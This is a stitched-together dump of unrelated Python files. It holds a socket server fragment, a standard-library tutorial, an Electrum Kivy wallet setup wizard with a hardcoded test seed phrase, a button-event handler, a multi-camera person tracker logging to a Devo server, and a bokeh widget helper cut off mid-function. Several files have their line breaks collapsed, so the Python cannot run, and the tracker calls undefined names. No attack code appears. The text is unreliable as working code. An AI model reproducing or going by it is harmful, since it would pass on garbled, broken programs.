t1.daemon = True
t1.start()

# Accept loop: one handler thread per judger connection.
while True:
    newSocket, addr = server.accept()
    print("client [%s] is connected!" % str(addr))
    client = threading.Thread(target=deal_client, args=(newSocket, addr))
    client.daemon = True
    client.start()
external-func.py
"""Stdlib tour: sys, pickle, os, shutil, glob, tempfile, time, calendar, random.

Imports are intentionally placed next to the topic they demonstrate,
tutorial-style, rather than at the top of the file.
"""
import sys

print(sys.argv)
# python3 external-func.py a b c
# ['external-func.py', 'a', 'b', 'c']
print(sys.path)
# You can add path using sys.path.append
# sys.exit()

import pickle

# Save an object.  NOTE: pickle output is binary, which is why the file is
# opened in "wb"/"rb" even though it is named .txt.
data = {1: "python", 2: "you need"}
with open("test.txt", "wb") as f:
    pickle.dump(data, f)

# Load the object back.
with open("test.txt", "rb") as f:
    data = pickle.load(f)
print(data)
# {1: 'python', 2: 'you need'}

import os

# print(os.environ)
# print(os.environ["PATH"])
"""
os.chdir("../")
print(os.getcwd())
print(os.system("ls"))
os.mkdir("Directory name")  # make dir
os.rmdir("Directory name")  # remove dir. only empty directory
os.unlink("filename")  # remove file
os.rename(src,"filename")  # rename file
"""

import shutil
shutil.copy("test.txt", "text_copy.txt")

import glob
print(glob.glob("./*"))
# print all file in this directory

import tempfile
# SECURITY NOTE: mktemp() only *names* a temp file and is race-prone;
# prefer tempfile.mkstemp() / NamedTemporaryFile in real code.
filename = tempfile.mktemp()
print(filename)
# /tmp/tmpbecg5zqs
# os.unlink(filename)

import time
print(time.time())
# 1503214710.753079
print(time.localtime(time.time()))
# time.struct_time(tm_year=2017, tm_mon=8, tm_mday=20, tm_hour=8, tm_min=4, tm_sec=54, tm_wday=6, tm_yday=232, tm_isdst=0)
print(time.ctime())
# Sun Aug 20 08:04:16 2017

"""
time.strftime("%x", time.localtime(time.time()))
%a Locale's abbreviated weekday name.
%A Locale's full weekday name.
%b Locale's abbreviated month name.
%B Locale's full month name.
%c Locale's appropriate date and time representation.
%d Day of the month as a decimal number [01,31].
%H Hour (24-hour clock) as a decimal number [00,23].
%I Hour (12-hour clock) as a decimal number [01,12].
%j Day of the year as a decimal number [001,366].
%m Month as a decimal number [01,12].
%M Minute as a decimal number [00,59].
%p Locale's equivalent of either AM or PM.
%S Second as a decimal number [00,61].
%U Week number of the year (Sunday first) as a decimal number [00,53].
%w Weekday as a decimal number [0(Sunday),6].
%W Week number of the year (Monday first) as a decimal number [00,53].
%x Locale's appropriate date representation.
%X Locale's appropriate time representation.
%y Year without century as a decimal number [00,99].
%Y Year with century as a decimal number.
%Z Time zone name (no characters if no time zone exists).
%% A literal '%' character.
"""

# for i in range(10):
#     print(i)
#     time.sleep(1)  # executed once per second

import calendar
print(calendar.calendar(2015))  # prints the whole year as a text grid
print(calendar.prmonth(2015, 12))  # prmonth prints the month and returns None
print(calendar.weekday(2017, 10, 1))
# 6   (Monday == 0, so 6 means Sunday)

import random
print(random.random())
# 0.5735225127879594
print(random.randint(1, 10))
# prints an int between 1 and 10 inclusive
shuffleList = [1, 2, 3, 4, 5]
random.shuffle(shuffleList)  # shuffles in place
print(shuffleList)
# [2, 1, 3, 5, 4]

# import webbrowser
# webbrowser.open("https://google.com")

# import threading
# import time
# def hi():
#     while True:
#         time.sleep(1)
#         print("hi")
# for i in range(3):
#     t = threading.Thread(target=hi, args=())
#     t.daemon = True  # (the attribute is `daemon`; `deamon` was a typo)
#     t.start()
installwizard.py
from functools import partial import threading from kivy.app import App from kivy.clock import Clock from kivy.lang import Builder from kivy.properties import ObjectProperty, StringProperty, OptionProperty from kivy.core.window import Window from kivy.uix.button import Button from kivy.utils import platform from kivy.uix.widget import Widget from kivy.core.window import Window from kivy.clock import Clock from kivy.utils import platform from electrum_gui.kivy.uix.dialogs import EventsDialog from electrum_gui.kivy.i18n import _ from electrum.base_wizard import BaseWizard from password_dialog import PasswordDialog # global Variables app = App.get_running_app() is_test = (platform == "linux") test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve" test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL" Builder.load_string(''' #:import Window kivy.core.window.Window #:import _ electrum_gui.kivy.i18n._ <WizardTextInput@TextInput> border: 4, 4, 4, 4 font_size: '15sp' padding: '15dp', '15dp' background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1) foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1) hint_text_color: self.foreground_color background_active: 'atlas://gui/kivy/theming/light/create_act_text_active' background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active' size_hint_y: None height: '48sp' <WizardButton@Button>: root: None size_hint: 1, None height: '48sp' on_press: if self.root: self.root.dispatch('on_press', self) on_release: if self.root: self.root.dispatch('on_release', self) <BigLabel@Label> color: .854, .925, .984, 1 size_hint: 1, None text_size: self.width, None height: self.texture_size[1] bold: True <-WizardDialog> text_color: .854, .925, .984, 1 value: '' #auto_dismiss: False size_hint: None, None canvas.before: Color: rgba: 0, 0, 0, .9 Rectangle: size: Window.size Color: rgba: 
.239, .588, .882, 1 Rectangle: size: Window.size crcontent: crcontent # add electrum icon BoxLayout: orientation: 'vertical' if self.width < self.height else 'horizontal' padding: min(dp(27), self.width/32), min(dp(27), self.height/32),\ min(dp(27), self.width/32), min(dp(27), self.height/32) spacing: '10dp' GridLayout: id: grid_logo cols: 1 pos_hint: {'center_y': .5} size_hint: 1, None height: self.minimum_height Label: color: root.text_color text: 'ELECTRUM' size_hint: 1, None height: self.texture_size[1] if self.opacity else 0 font_size: '33sp' font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf' GridLayout: cols: 1 id: crcontent spacing: '1dp' Widget: size_hint: 1, 0.3 GridLayout: rows: 1 spacing: '12dp' size_hint: 1, None height: self.minimum_height WizardButton: id: back text: _('Back') root: root WizardButton: id: next text: _('Next') root: root disabled: root.value == '' <WizardMultisigDialog> value: 'next' Widget size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: _("Choose the number of signatures needed to unlock funds in your wallet") Widget size_hint: 1, 1 GridLayout: orientation: 'vertical' cols: 2 spacing: '14dp' size_hint: 1, 1 height: self.minimum_height Label: color: root.text_color text: _('From %d cosigners')%n.value Slider: id: n range: 2, 5 step: 1 value: 2 Label: color: root.text_color text: _('Require %d signatures')%m.value Slider: id: m range: 1, n.value step: 1 value: 2 <WizardChoiceDialog> message : '' Widget: size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message Widget size_hint: 1, 1 GridLayout: row_default_height: '48dp' orientation: 'vertical' id: choices cols: 1 spacing: '14dp' size_hint: 1, None <MButton@Button>: size_hint: 1, None height: '33dp' on_release: self.parent.update_amount(self.text) <WordButton@Button>: size_hint: None, None padding: '5dp', '5dp' text_size: None, 
self.height width: self.texture_size[0] height: '30dp' on_release: self.parent.new_word(self.text) <SeedButton@Button>: height: dp(100) border: 4, 4, 4, 4 halign: 'justify' valign: 'top' font_size: '18dp' text_size: self.width - dp(24), self.height - dp(12) color: .1, .1, .1, 1 background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top' background_down: self.background_normal size_hint_y: None <SeedLabel@Label>: font_size: '12sp' text_size: self.width, None size_hint: 1, None height: self.texture_size[1] halign: 'justify' valign: 'middle' border: 4, 4, 4, 4 <RestoreSeedDialog> message: '' word: '' BigLabel: text: "ENTER YOUR SEED PHRASE" GridLayout cols: 1 padding: 0, '12dp' orientation: 'vertical' spacing: '12dp' size_hint: 1, None height: self.minimum_height SeedButton: id: text_input_seed text: '' on_text: Clock.schedule_once(root.on_text) on_release: root.options_dialog() SeedLabel: text: root.message BoxLayout: id: suggestions height: '35dp' size_hint: 1, None new_word: root.on_word BoxLayout: id: line1 update_amount: root.update_text size_hint: 1, None height: '30dp' MButton: text: 'Q' MButton: text: 'W' MButton: text: 'E' MButton: text: 'R' MButton: text: 'T' MButton: text: 'Y' MButton: text: 'U' MButton: text: 'I' MButton: text: 'O' MButton: text: 'P' BoxLayout: id: line2 update_amount: root.update_text size_hint: 1, None height: '30dp' Widget: size_hint: 0.5, None height: '33dp' MButton: text: 'A' MButton: text: 'S' MButton: text: 'D' MButton: text: 'F' MButton: text: 'G' MButton: text: 'H' MButton: text: 'J' MButton: text: 'K' MButton: text: 'L' Widget: size_hint: 0.5, None height: '33dp' BoxLayout: id: line3 update_amount: root.update_text size_hint: 1, None height: '30dp' Widget: size_hint: 1, None MButton: text: 'Z' MButton: text: 'X' MButton: text: 'C' MButton: text: 'V' MButton: text: 'B' MButton: text: 'N' MButton: text: 'M' MButton: text: ' ' MButton: text: '<' <AddXpubDialog> title: '' message: '' BigLabel: text: root.title GridLayout 
cols: 1 padding: 0, '12dp' orientation: 'vertical' spacing: '12dp' size_hint: 1, None height: self.minimum_height SeedButton: id: text_input text: '' on_text: Clock.schedule_once(root.check_text) SeedLabel: text: root.message GridLayout rows: 1 spacing: '12dp' size_hint: 1, None height: self.minimum_height IconButton: id: scan height: '48sp' on_release: root.scan_xpub() icon: 'atlas://gui/kivy/theming/light/camera' size_hint: 1, None WizardButton: text: _('Paste') on_release: root.do_paste() WizardButton: text: _('Clear') on_release: root.do_clear() <ShowXpubDialog> xpub: '' message: _('Here is your master public key. Share it with your cosigners.') BigLabel: text: "MASTER PUBLIC KEY" GridLayout cols: 1 padding: 0, '12dp' orientation: 'vertical' spacing: '12dp' size_hint: 1, None height: self.minimum_height SeedButton: id: text_input text: root.xpub SeedLabel: text: root.message GridLayout rows: 1 spacing: '12dp' size_hint: 1, None height: self.minimum_height WizardButton: text: _('QR code') on_release: root.do_qr() WizardButton: text: _('Copy') on_release: root.do_copy() WizardButton: text: _('Share') on_release: root.do_share() <ShowSeedDialog> spacing: '12dp' value: 'next' BigLabel: text: "PLEASE WRITE DOWN YOUR SEED PHRASE" GridLayout: id: grid cols: 1 pos_hint: {'center_y': .5} size_hint_y: None height: self.minimum_height orientation: 'vertical' spacing: '12dp' SeedButton: text: root.seed_text on_release: root.options_dialog() SeedLabel: text: root.message <LineDialog> BigLabel: text: root.title SeedLabel: text: root.message TextInput: id: passphrase_input multiline: False size_hint: 1, None height: '27dp' SeedLabel: text: root.warning ''') class WizardDialog(EventsDialog): ''' Abstract dialog to be used as the base for all Create Account Dialogs ''' crcontent = ObjectProperty(None) def __init__(self, wizard, **kwargs): super(WizardDialog, self).__init__(**kwargs) self.wizard = wizard self.ids.back.disabled = not wizard.can_go_back() self.app = 
App.get_running_app() self.run_next = kwargs['run_next'] _trigger_size_dialog = Clock.create_trigger(self._size_dialog) Window.bind(size=_trigger_size_dialog, rotation=_trigger_size_dialog) _trigger_size_dialog() self._on_release = False def _size_dialog(self, dt): app = App.get_running_app() if app.ui_mode[0] == 'p': self.size = Window.size else: #tablet if app.orientation[0] == 'p': #portrait self.size = Window.size[0]/1.67, Window.size[1]/1.4 else: self.size = Window.size[0]/2.5, Window.size[1] def add_widget(self, widget, index=0): if not self.crcontent: super(WizardDialog, self).add_widget(widget) else: self.crcontent.add_widget(widget, index=index) def on_dismiss(self): app = App.get_running_app() if app.wallet is None and not self._on_release: app.stop() def get_params(self, button): return (None,) def on_release(self, button): self._on_release = True self.close() if not button: self.parent.dispatch('on_wizard_complete', None) return if button is self.ids.back: self.wizard.go_back() return params = self.get_params(button) self.run_next(*params) class WizardMultisigDialog(WizardDialog): def get_params(self, button): m = self.ids.m.value n = self.ids.n.value return m, n class WizardChoiceDialog(WizardDialog): def __init__(self, wizard, **kwargs): super(WizardChoiceDialog, self).__init__(wizard, **kwargs) self.message = kwargs.get('message', '') choices = kwargs.get('choices', []) layout = self.ids.choices layout.bind(minimum_height=layout.setter('height')) for action, text in choices: l = WizardButton(text=text) l.action = action l.height = '48dp' l.root = self layout.add_widget(l) def on_parent(self, instance, value): if value: app = App.get_running_app() self._back = _back = partial(app.dispatch, 'on_back') def get_params(self, button): return (button.action,) class LineDialog(WizardDialog): title = StringProperty('') message = StringProperty('') warning = StringProperty('') def __init__(self, wizard, **kwargs): WizardDialog.__init__(self, wizard, **kwargs) 
self.ids.next.disabled = False def get_params(self, b): return (self.ids.passphrase_input.text,) class ShowSeedDialog(WizardDialog): seed_text = StringProperty('') message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.") ext = False def on_parent(self, instance, value): if value: app = App.get_running_app() self._back = _back = partial(self.ids.back.dispatch, 'on_release') def options_dialog(self): from seed_options import SeedOptionsDialog def callback(status): self.ext = status d = SeedOptionsDialog(self.ext, callback) d.open() def get_params(self, b): return (self.ext,) class WordButton(Button): pass class WizardButton(Button): pass class RestoreSeedDialog(WizardDialog): def __init__(self, wizard, **kwargs): super(RestoreSeedDialog, self).__init__(wizard, **kwargs) self._test = kwargs['test'] from electrum.mnemonic import Mnemonic from electrum.old_mnemonic import words as old_wordlist self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist)) self.ids.text_input_seed.text = test_seed if is_test else '' self.message = _('Please type your seed phrase using the virtual keyboard.') self.title = _('Enter Seed') self.ext = False def options_dialog(self): from seed_options import SeedOptionsDialog def callback(status): self.ext = status d = SeedOptionsDialog(self.ext, callback) d.open() def get_suggestions(self, prefix): for w in self.words: if w.startswith(prefix): yield w def on_text(self, dt): self.ids.next.disabled = not bool(self._test(self.get_text())) text = self.ids.text_input_seed.text if not text: last_word = '' elif text[-1] == ' ': last_word = '' else: last_word = text.split(' ')[-1] enable_space = False self.ids.suggestions.clear_widgets() suggestions = [x for x in self.get_suggestions(last_word)] if last_word in suggestions: b = WordButton(text=last_word) self.ids.suggestions.add_widget(b) enable_space = True for w in suggestions: if w != last_word and len(suggestions) < 10: b = 
WordButton(text=w) self.ids.suggestions.add_widget(b) i = len(last_word) p = set() for x in suggestions: if len(x)>i: p.add(x[i]) for line in [self.ids.line1, self.ids.line2, self.ids.line3]: for c in line.children: if isinstance(c, Button): if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ': c.disabled = (c.text.lower() not in p) and last_word elif c.text == ' ': c.disabled = not enable_space def on_word(self, w): text = self.get_text() words = text.split(' ') words[-1] = w text = ' '.join(words) self.ids.text_input_seed.text = text + ' ' self.ids.suggestions.clear_widgets() def get_text(self): ti = self.ids.text_input_seed text = unicode(ti.text).strip() text = ' '.join(text.split()) return text def update_text(self, c): c = c.lower() text = self.ids.text_input_seed.text if c == '<': text = text[:-1] else: text += c self.ids.text_input_seed.text = text def on_parent(self, instance, value): if value: tis = self.ids.text_input_seed tis.focus = True #tis._keyboard.bind(on_key_down=self.on_key_down) self._back = _back = partial(self.ids.back.dispatch, 'on_release') app = App.get_running_app() def on_key_down(self, keyboard, keycode, key, modifiers): if keycode[0] in (13, 271): self.on_enter() return True def on_enter(self): #self._remove_keyboard() # press next next = self.ids.next if not next.disabled: next.dispatch('on_release') def _remove_keyboard(self): tis = self.ids.text_input_seed if tis._keyboard: tis._keyboard.unbind(on_key_down=self.on_key_down) tis.focus = False def get_params(self, b): return (self.get_text(), False, self.ext) class ConfirmSeedDialog(RestoreSeedDialog): def get_params(self, b): return (self.get_text(),) def options_dialog(self): pass class ShowXpubDialog(WizardDialog): def __init__(self, wizard, **kwargs): WizardDialog.__init__(self, wizard, **kwargs) self.xpub = kwargs['xpub'] self.ids.next.disabled = False def do_copy(self): self.app._clipboard.copy(self.xpub) def do_share(self): self.app.do_share(self.xpub, _("Master Public Key")) def 
do_qr(self): from qr_dialog import QRDialog popup = QRDialog(_("Master Public Key"), self.xpub, True) popup.open() class AddXpubDialog(WizardDialog): def __init__(self, wizard, **kwargs): WizardDialog.__init__(self, wizard, **kwargs) self.is_valid = kwargs['is_valid'] self.title = kwargs['title'] self.message = kwargs['message'] def check_text(self, dt): self.ids.next.disabled = not bool(self.is_valid(self.get_text())) def get_text(self): ti = self.ids.text_input return unicode(ti.text).strip() def get_params(self, button): return (self.get_text(),) def scan_xpub(self): def on_complete(text): self.ids.text_input.text = text self.app.scan_qr(on_complete) def do_paste(self): self.ids.text_input.text = test_xpub if is_test else unicode(self.app._clipboard.paste()) def do_clear(self): self.ids.text_input.text = '' class InstallWizard(BaseWizard, Widget): ''' events:: `on_wizard_complete` Fired when the wizard is done creating/ restoring wallet/s. ''' __events__ = ('on_wizard_complete', ) def on_wizard_complete(self, wallet): """overriden by main_window""" pass def waiting_dialog(self, task, msg): '''Perform a blocking task in the background by running the passed method in a thread. 
''' def target(): # run your threaded function try: task() except Exception as err: self.show_error(str(err)) # on completion hide message Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1) app.show_info_bubble( text=msg, icon='atlas://gui/kivy/theming/light/important', pos=Window.center, width='200sp', arrow_pos=None, modal=True) t = threading.Thread(target = target) t.start() def terminate(self, **kwargs): self.dispatch('on_wizard_complete', self.wallet) def choice_dialog(self, **kwargs): choices = kwargs['choices'] if len(choices) > 1: WizardChoiceDialog(self, **kwargs).open() else: f = kwargs['run_next'] apply(f, (choices[0][0],)) def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open() def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open() def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open() def confirm_seed_dialog(self, **kwargs): kwargs['title'] = _('Confirm Seed') kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it') ConfirmSeedDialog(self, **kwargs).open() def restore_seed_dialog(self, **kwargs): RestoreSeedDialog(self, **kwargs).open() def add_xpub_dialog(self, **kwargs): kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.') AddXpubDialog(self, **kwargs).open() def add_cosigner_dialog(self, **kwargs): kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index'] kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.') AddXpubDialog(self, **kwargs).open() def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open() def show_error(self, msg): Clock.schedule_once(lambda dt: app.show_error(msg)) def password_dialog(self, message, callback): popup = PasswordDialog() popup.init(message, callback) popup.open() def request_password(self, run_next): def callback(pin): if pin: self.run('confirm_password', pin, run_next) else: run_next(None) self.password_dialog('Choose 
a PIN code', callback) def confirm_password(self, pin, run_next): def callback(conf): if conf == pin: run_next(pin, False) else: self.show_error(_('PIN mismatch')) self.run('request_password', run_next) self.password_dialog('Confirm your PIN code', callback) def action_dialog(self, action, run_next): f = getattr(self, action) f()
advancedbutton.py
import time import threading DOUBLE_CLICK_TIME = 0.5 LONG_PRESS_TIME = 0.7 class AdvancedButton: def __init__(self, hub): self.state = 0 self.last_pressed = 0 self.press_time = None self.hub = hub self.hub.button.subscribe(self.pressed) self.click = ButtonAction() self.double_click = ButtonAction() self.long_press = ButtonAction() def pressed(self, state): if state == 2: return press_time = time.time() if state == 1: self.state = 1 self.press_time = press_time return if state == 0 and self.state == 1: self.state = 0 press_duration = press_time - self.press_time else: return if press_duration > LONG_PRESS_TIME: # long press self.long_press.notify() return if (press_time - self.last_pressed) < DOUBLE_CLICK_TIME: # double click self.last_pressed = 0 self.double_click.notify() return # could be first of a double click, could be single click self.last_pressed = press_time def timeout(): time.sleep(DOUBLE_CLICK_TIME) if self.last_pressed == press_time: # not clicked while sleeping # single click self.click.notify() threading.Thread(target=timeout).start() class ButtonAction: def __init__(self): self.subscribers = set() def subscribe(self, callback): self.subscribers.add(callback) def unsubscribe(self, callback=None): if callback in self.subscribers: self.subscribers.remove(callback) def notify(self): for subscriber in self.subscribers.copy(): subscriber()
# --- person_tracker_old.py ---
""" Copyright (c) 2019 Intel Corporation Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import argparse import os import queue from threading import Thread import json import logging as log import sys import time import cv2 as cv from utils.log_sender import logger from utils.network_wrappers import Detector, VectorCNN from mc_tracker.mct import MultiCameraTracker from utils.misc import read_py_config from utils.streaming import MultiStreamerCapture from utils.visualization import visualize_multicam_detections ### Devo Sender from devo.sender import Sender, SenderConfigSSL, SenderConfigTCP log.basicConfig(stream=sys.stdout, level=log.DEBUG) DEFAULT_SERVER = "eu.elb.relay.logtrust.net" DEFAULT_PORT = 443 DEFAULT_TABLE_NAME = 'my.app.tracker_box.info' DEFAULT_STAT_TABLE_NAME = 'my.app.tracker.stats' DEFAULT_SOURCE = "unknown" KEY = "CERTS/key.key" CERT = "CERTS/cert.crt" CHAIN = "CERTS/chain.crt" class FramesThreadBody: def __init__(self, capture, timer, max_queue_length=2): self.process = True self.frames_queue = queue.Queue() self.capture = capture self.max_queue_length = max_queue_length self.timer = timer def __call__(self): while self.process: if self.frames_queue.qsize() > self.max_queue_length: time.sleep(self.timer) has_frames, frames = self.capture.get_frames() if not has_frames and self.frames_queue.empty(): self.process = False break if has_frames: self.frames_queue.put(frames) def run(params, capture, detector, reid): config = {} if len(params.config): config = 
read_py_config(params.config) if params.debug: win_name = 'Multi camera tracking' else: engine_config = SenderConfigSSL(address=(params.devo_server, params.devo_port), key=KEY, cert=CERT, chain=CHAIN) sender = Sender(engine_config) # arreglar que el tamaño sea de acuerdo a lo que entra if params.broadcast: GST_PIPE = "appsrc is-live=1 \ ! videoconvert \ ! video/x-raw, width=1920, height=1080, framerate=1/1 \ ! queue \ ! x264enc bitrate=4500 byte-stream=false key-int-max=60 bframes=0 aud=true tune=zerolatency \ ! video/x-h264,profile=main \ ! flvmux streamable=true name=mux \ ! rtmpsink location={0} audiotestsrc \ ! voaacenc bitrate=128000 \ ! mux.".format(params.broadcast) out_send = cv.VideoWriter(GST_PIPE, cv.CAP_GSTREAMER, 0, 1, (1920, 1080), True) tracker = MultiCameraTracker(capture.get_num_sources(), reid, **config) thread_body = FramesThreadBody(capture, params.processing_timer, max_queue_length=len(capture.captures) * 2) frames_thread = Thread(target=thread_body) frames_thread.start() if len(params.output_video): video_output_size = (1920 // capture.get_num_sources(), 1080) fourcc = cv.VideoWriter_fourcc(*'XVID') output_video = cv.VideoWriter(params.output_video, fourcc, 24.0, video_output_size) else: output_video = None while cv.waitKey(1) != 27 and thread_body.process: start = time.time() try: frames = thread_body.frames_queue.get_nowait() except queue.Empty: frames = None if frames is None: continue all_detections = detector.get_detections(frames) all_masks = [[] for _ in range(len(all_detections))] for i, detections in enumerate(all_detections): all_detections[i] = [det[0] for det in detections] all_masks[i] = [det[2] for det in detections if len(det) == 3] tracker.process(frames, all_detections, all_masks) tracked_objects = tracker.get_tracked_objects() if params.debug: fps = round(1 / (time.time() - start), 1) vis = visualize_multicam_detections(frames, tracked_objects, fps) cv.imshow(win_name, vis) if output_video: output_video.write(cv.resize(vis, 
video_output_size)) if params.broadcast: out_send.write(vis) else: # engine_config = SenderConfigTCP(address=('localhost', 1514)) logger(params.tablename, sender, frames, tracked_objects, params.source) end = time.time() if (params.processing_timer - (end - start)) > 0: time.sleep(params.processing_timer - (end - start)) if params.broadcast: out_send.write(visualize_detections(frames, detections, labels_map, fps)) thread_body.process = False frames_thread.join() if len(params.history_file): history = tracker.get_all_tracks_history() with open(params.history_file, 'w') as outfile: json.dump(history, outfile) def main(): """Prepares data for the person recognition demo""" parser = argparse.ArgumentParser(description='Multi camera multi person \ tracking live demo script') parser.add_argument('-i', type=str, nargs='+', help='List of cameras url address', required=True) parser.add_argument('-m', '--m_detector', type=str, help='Path to the person detection model', default='models/detector/person-detection-retail-0013.xml') parser.add_argument('--t_detector', type=float, default=0.6, help='Threshold for the person detection model') parser.add_argument('--m_reid', type=str, help='Path to the person reidentification model', default='models/detector/person-reidentification-retail-0079.xml') parser.add_argument('--output_video', type=str, default='', required=False) parser.add_argument('--config', type=str, default='', required=False) parser.add_argument('--history_file', type=str, default='', required=False) parser.add_argument('-d', '--device', type=str, default='CPU') parser.add_argument("-l", "--cpu_extension", help="Optional. Required for CPU custom layers. 
Absolute path to a shared library with the " "kernels implementations.", type=str, default='/root/inference_engine_samples_build/intel64/Release/lib/libcpu_extension.so') parser.add_argument('-p', "--processing_timer", help='Processing time step (in seconds)', default=0.1, type=float) parser.add_argument('-t', '--tablename', help='Table Name.', default=DEFAULT_TABLE_NAME, type=str) parser.add_argument('-ds', '--devo_server', help='Devo Server.', default=DEFAULT_SERVER, type=str) parser.add_argument('-dp', '--devo_port', help='Devo Port.', default=DEFAULT_PORT, type=str) parser.add_argument('-b', "--broadcast", help='Streaming broadcast address.', type=str) parser.add_argument('-db', "--debug", help='Debug Mode: No logs are sent and the images process result is show in a windows ', action="store_true") parser.add_argument('-s', "--source", help='Stream source identifier.', type=str, default=DEFAULT_SOURCE) args = parser.parse_args() capture = MultiStreamerCapture(args.i) person_detector = Detector(args.m_detector, args.t_detector, args.device, args.cpu_extension, capture.get_num_sources()) if args.m_reid: person_recognizer = VectorCNN(args.m_reid, args.device) else: person_recognizer = None run(args, capture, person_detector, person_recognizer) log.info('Demo finished successfully') if __name__ == '__main__': main()
# --- cell_widgets.py ---
from ipme.utils.functions import get_dim_names_options
from .global_reset import GlobalReset
from bokeh.models.widgets import Select, Button
from functools import partial
import threading


class CellWidgets:
    """Static helpers that create, link and drive the per-cell indexing
    widgets (bokeh Select menus) of a diagram grid.
    """

    def __init__(self):
        pass

    @staticmethod
    def initialize_widgets(cell):
        """Create one Select widget per indexing dimension of every space of ``cell``."""
        for space in cell.spaces:
            cell.widgets[space] = {}
            for _, d_dim in cell.idx_dims.items():
                n1, n2, opt1, opt2 = get_dim_names_options(d_dim)
                cell.widgets[space][n1] = Select(title=n1, value=opt1[0], options=opt1)
                cell.widgets[space][n1].on_change("value", partial(cell.widget_callback, w_title=n1, space=space))
                if n1 not in cell.cur_idx_dims_values:
                    inds = [i for i, v in enumerate(d_dim.values) if v == opt1[0]]
                    cell.cur_idx_dims_values[n1] = inds
                if n2:
                    cell.widgets[space][n2] = Select(title=n2, value=opt2[0], options=opt2)
                    cell.widgets[space][n2].on_change("value", partial(cell.widget_callback, w_title=n2, space=space))
                    cell.ic.idx_widgets_mapping(space, d_dim, n1, n2)
                    if n2 not in cell.cur_idx_dims_values:
                        cell.cur_idx_dims_values[n2] = [0]

    @staticmethod
    def _widget_callback_int(variableCell, attr, old, new, w_title, space):
        """
        Callback called when an indexing dimension is set to
        a new coordinate (e.g through indexing dimensions widgets).
        Interactive mode: the heavy work runs on a daemon worker thread.
        """
        if old == new:
            return
        variableCell.ic.add_widget_threads(
            threading.Thread(target=partial(CellWidgets._widget_callback_thread_inter,
                                            variableCell, new, w_title, space),
                             daemon=True))
        variableCell.ic.widget_lock_event.set()

    @staticmethod
    def _widget_callback_static(variableCell, attr, old, new, w_title, space):
        """
        Callback called when an indexing dimension is set to
        a new coordinate (e.g through indexing dimensions widgets).
        Static mode: the heavy work runs on a daemon worker thread.
        """
        if old == new:
            return
        variableCell.ic.add_widget_threads(
            threading.Thread(target=partial(CellWidgets._widget_callback_thread_static,
                                            variableCell, new, w_title, space),
                             daemon=True))
        variableCell.ic.widget_lock_event.set()

    # CONSISTENCY FIX: the two thread bodies below were plain functions inside
    # the class body; they are now decorated @staticmethod like every sibling.
    @staticmethod
    def _widget_callback_thread_inter(variableCell, new, w_title, space):
        """Resolve the selected coordinate to value indices, then refresh
        the source CDS and the interactive plot for ``space``."""
        inds = -1
        w2_title = ""
        values = []
        w1_w2_idx_mapping = variableCell.ic.get_w1_w2_idx_mapping()
        w2_w1_val_mapping = variableCell.ic.get_w2_w1_val_mapping()
        w2_w1_idx_mapping = variableCell.ic.get_w2_w1_idx_mapping()
        widgets = variableCell.widgets[space]
        if space in w1_w2_idx_mapping and w_title in w1_w2_idx_mapping[space]:
            for w2_title in w1_w2_idx_mapping[space][w_title]:
                name = w_title + "_idx_" + w2_title
                if name in variableCell.idx_dims:
                    values = variableCell.idx_dims[name].values
        # Sequential fallbacks: plain dimension values, then the w2->w1 mapping.
        if len(values) == 0 and w_title in variableCell.idx_dims:
            values = variableCell.idx_dims[w_title].values
        if len(values) == 0 and space in w2_w1_idx_mapping and w_title in w2_w1_idx_mapping[space]:
            for w1_idx in w2_w1_idx_mapping[space][w_title]:
                w1_value = widgets[w1_idx].value
                values = w2_w1_val_mapping[space][w_title][w1_value]
        inds = [i for i, v in enumerate(values) if v == new]
        if inds == -1 or len(inds) == 0:
            return
        variableCell.cur_idx_dims_values[w_title] = inds
        if w2_title and w2_title in variableCell.cur_idx_dims_values:
            variableCell.cur_idx_dims_values[w2_title] = [0]
        variableCell.update_source_cds(space)
        variableCell.ic.set_global_update(True)
        variableCell.update_cds(space)

    @staticmethod
    def _widget_callback_thread_static(variableCell, new, w_title, space):
        """Resolve the selected coordinate to value indices, then refresh
        the static plot for ``space``."""
        inds = -1
        w2_title = ""
        values = []
        w1_w2_idx_mapping = variableCell.ic.get_w1_w2_idx_mapping()
        w2_w1_val_mapping = variableCell.ic.get_w2_w1_val_mapping()
        w2_w1_idx_mapping = variableCell.ic.get_w2_w1_idx_mapping()
        widgets = variableCell.widgets[space]
        if space in w1_w2_idx_mapping and w_title in w1_w2_idx_mapping[space]:
            for w2_title in w1_w2_idx_mapping[space][w_title]:
                name = w_title + "_idx_" + w2_title
                if name in variableCell.idx_dims:
                    values = variableCell.idx_dims[name].values
        elif w_title in variableCell.idx_dims:
            values = variableCell.idx_dims[w_title].values
        elif space in w2_w1_idx_mapping and w_title in w2_w1_idx_mapping[space]:
            for w1_idx in w2_w1_idx_mapping[space][w_title]:
